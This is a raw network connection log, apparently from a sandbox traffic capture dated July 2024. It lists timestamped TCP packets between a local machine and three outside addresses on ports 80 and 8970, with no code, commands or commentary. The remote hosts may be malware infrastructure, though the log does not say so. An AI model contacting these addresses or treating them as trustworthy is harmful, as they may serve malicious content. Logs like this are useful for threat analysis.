                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.790410995 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.790426016 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.790446997 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.790467024 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.790481091 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.790505886 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.790517092 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.790528059 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.790576935 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.790735960 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.790787935 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.790795088 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.790822029 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.790848970 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.790868044 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.790870905 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.790906906 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.790925026 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.790940046 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.790961981 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.790977001 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.791002989 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.791004896 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.791038036 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.791040897 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.791063070 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.791093111 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.791095018 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.791126013 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.791157007 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.791158915 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.791177988 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.791196108 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.791214943 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.791254997 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.791316986 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.791352987 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.791373968 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.791387081 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.791405916 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.791434050 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817182064 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817204952 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817223072 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817351103 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817352057 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817352057 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817529917 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817554951 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817570925 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817585945 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817594051 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817608118 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817622900 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817650080 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817666054 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817679882 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817696095 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817709923 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817718029 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817718029 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817718029 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817718983 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817718983 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817718983 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817728996 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817745924 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817759037 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817761898 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817780018 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817786932 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817800045 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817804098 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817826033 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817826033 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817847013 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817862034 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817863941 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817881107 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817899942 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817919016 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817935944 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817960978 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817970991 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.817985058 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.818005085 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.818030119 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.818061113 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.818128109 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.818162918 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.818191051 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.818198919 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.818212986 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.818237066 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.818253994 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.818272114 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.818295956 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.818348885 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.825438023 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.825481892 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.825537920 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.825573921 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.825614929 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.825614929 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.825615883 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.825627089 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.825663090 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.825696945 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.825733900 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.825814962 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.825814962 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.825814962 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.825814962 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.825814962 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.826591015 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.826642036 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.826659918 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.826678991 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.826699018 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.826713085 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.826730967 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.826751947 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.826773882 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.826788902 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.826805115 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:03.826845884 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:04.770736933 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:04.771359921 CEST4970580192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:04.776355028 CEST804970477.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:04.776429892 CEST4970480192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:04.776715040 CEST804970577.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:04.776930094 CEST4970580192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:04.782187939 CEST4970580192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:04.789304018 CEST804970577.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:05.517060041 CEST804970577.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:05.517158985 CEST4970580192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:05.523602009 CEST4970680192.168.2.5185.216.214.217
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:05.528595924 CEST8049706185.216.214.217192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:05.529036045 CEST4970680192.168.2.5185.216.214.217
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:05.540261030 CEST4970680192.168.2.5185.216.214.217
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:05.546447992 CEST8049706185.216.214.217192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:07.730217934 CEST497108970192.168.2.5185.172.128.33
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:07.735671997 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:07.735867023 CEST497108970192.168.2.5185.172.128.33
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:07.743110895 CEST497108970192.168.2.5185.172.128.33
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:07.748142004 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:08.370290995 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:08.398513079 CEST497108970192.168.2.5185.172.128.33
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:08.403743029 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:08.592535973 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:08.635679007 CEST497108970192.168.2.5185.172.128.33
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:09.572240114 CEST4970680192.168.2.5185.216.214.217
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:13.646346092 CEST497108970192.168.2.5185.172.128.33
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:13.652590990 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:13.939318895 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:13.939353943 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:13.939371109 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:13.939495087 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:13.939511061 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:13.939534903 CEST497108970192.168.2.5185.172.128.33
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:13.939621925 CEST497108970192.168.2.5185.172.128.33
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:13.939914942 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:13.940074921 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:13.940140963 CEST497108970192.168.2.5185.172.128.33
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:13.940167904 CEST497108970192.168.2.5185.172.128.33
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:14.093379021 CEST497108970192.168.2.5185.172.128.33
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:14.098751068 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:14.283359051 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:14.338829041 CEST497108970192.168.2.5185.172.128.33
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:14.372472048 CEST497108970192.168.2.5185.172.128.33
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:14.377602100 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:14.561830997 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:14.569740057 CEST497108970192.168.2.5185.172.128.33
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:14.574790001 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:14.589772940 CEST4972180192.168.2.5185.216.214.217
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:14.597330093 CEST8049721185.216.214.217192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:14.597455025 CEST4972180192.168.2.5185.216.214.217
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:14.597671032 CEST4972180192.168.2.5185.216.214.217
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:14.604593992 CEST8049721185.216.214.217192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:14.764182091 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:14.768244982 CEST497108970192.168.2.5185.172.128.33
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:14.773602009 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:14.957204103 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:14.963116884 CEST497108970192.168.2.5185.172.128.33
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:14.969372034 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:15.161776066 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:15.213829041 CEST497108970192.168.2.5185.172.128.33
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:15.236910105 CEST497108970192.168.2.5185.172.128.33
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:15.241884947 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:15.241902113 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:15.241925001 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:15.241936922 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:15.241960049 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:15.241971970 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:15.241985083 CEST497108970192.168.2.5185.172.128.33
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:15.242007017 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:15.242019892 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:15.242031097 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:15.242075920 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:15.242088079 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:15.246953964 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:15.246978045 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:15.247087955 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:15.524303913 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:15.573295116 CEST497108970192.168.2.5185.172.128.33
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:16.140007019 CEST497108970192.168.2.5185.172.128.33
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:16.145304918 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:16.330962896 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:16.335494041 CEST497108970192.168.2.5185.172.128.33
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:16.340688944 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:16.524252892 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:16.526854038 CEST497108970192.168.2.5185.172.128.33
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:16.531945944 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:16.715605974 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:16.719259024 CEST497108970192.168.2.5185.172.128.33
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:16.724287033 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:16.910264969 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:16.911869049 CEST497108970192.168.2.5185.172.128.33
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:16.919975996 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:17.307401896 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:17.309741020 CEST497108970192.168.2.5185.172.128.33
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:17.314764023 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:17.500607014 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:17.501648903 CEST497108970192.168.2.5185.172.128.33
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:17.509881020 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:17.893603086 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:17.948190928 CEST497108970192.168.2.5185.172.128.33
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:17.958523989 CEST497108970192.168.2.5185.172.128.33
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:17.963367939 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:18.147495031 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:18.176887035 CEST497108970192.168.2.5185.172.128.33
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:18.182054996 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:18.365638971 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:18.416944027 CEST497108970192.168.2.5185.172.128.33
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:18.465650082 CEST497108970192.168.2.5185.172.128.33
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:18.470742941 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:18.604567051 CEST4972180192.168.2.5185.216.214.217
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:18.660232067 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:18.665190935 CEST497108970192.168.2.5185.172.128.33
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:18.670311928 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:18.670340061 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:18.670372963 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:18.670388937 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:18.670401096 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:18.670521975 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:18.863534927 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:18.864015102 CEST497108970192.168.2.5185.172.128.33
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:18.868973017 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:19.054128885 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:19.054946899 CEST497108970192.168.2.5185.172.128.33
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:19.059935093 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:19.244795084 CEST897049710185.172.128.33192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:19.274676085 CEST497108970192.168.2.5185.172.128.33
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:23.631938934 CEST5896980192.168.2.5185.216.214.217
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:23.637082100 CEST8058969185.216.214.217192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:23.637218952 CEST5896980192.168.2.5185.216.214.217
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:23.637501955 CEST5896980192.168.2.5185.216.214.217
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:23.642745018 CEST8058969185.216.214.217192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:27.635835886 CEST5896980192.168.2.5185.216.214.217
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:32.653897047 CEST4970580192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:32.654118061 CEST5897380192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:32.660166025 CEST805897377.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:32.660327911 CEST5897380192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:32.660417080 CEST5897380192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:32.660938978 CEST804970577.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:32.661125898 CEST4970580192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:32.665808916 CEST805897377.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:33.362234116 CEST805897377.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:33.362437963 CEST5897380192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:33.363639116 CEST5897480192.168.2.5185.216.214.217
